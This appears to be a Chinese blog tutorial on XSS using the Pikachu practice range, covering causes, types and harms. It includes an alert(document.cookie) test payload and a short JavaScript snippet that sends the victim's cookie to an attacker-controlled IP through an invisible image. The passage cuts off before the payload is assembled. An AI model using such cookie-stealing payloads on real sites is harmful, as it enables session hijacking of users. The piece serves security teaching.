XSS解析——pikachu靶场

本文详细介绍了XSS漏洞的原因、分类和危害,重点讨论了反射型XSS和存储型XSS的攻击方式,包括劫持用户COOKIE、框架钓鱼、挂马和键盘记录等。通过实例展示了如何在Pikachu靶场上实践这些攻击,强调了防止XSS攻击的重要性。
摘要由CSDN通过智能技术生成

XSS漏洞出现的原因

       程序对输入和输出控制不够严格,导致恶意构造的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行而产生危害

XSS分类

反射型XSS

储存性XSS

DOM型XSS

XSS的危害

劫持用户COOKIE

Cookie是用户对于特定网站的身份验证标志。XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。

反射型XSS(get)

首先,试试直接获取本地的cookie

先修改字符长度的限制

然后输入

<script>alert(document.cookie)</script>

就能获取cookie

利用这个原理可以尝试截取其他用户的cookie

方法一:

提前在攻击机上写好js代码evil.js

var img=document.createElement("img");
img.src="http://192.168.111.130/log?"+escape(document.cookie);
document.body.appendChild(img);

这段代码在页面中插入了一张看不见的图片,同时把 document.cookie 对象作为参数发送到远程服务器,这样,就完成了一个简单的窃取 Cookie 的 XSS Payload

 构造payload


                
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值